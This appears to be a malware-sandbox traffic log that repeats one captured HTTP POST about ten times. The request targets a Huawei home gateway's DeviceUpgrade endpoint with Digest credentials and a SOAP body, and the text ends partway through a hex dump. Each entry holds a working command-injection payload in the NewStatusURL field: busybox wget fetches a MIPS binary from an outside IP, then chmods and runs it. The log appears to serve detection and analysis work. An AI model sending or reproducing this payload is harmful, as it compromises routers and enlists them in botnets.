              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 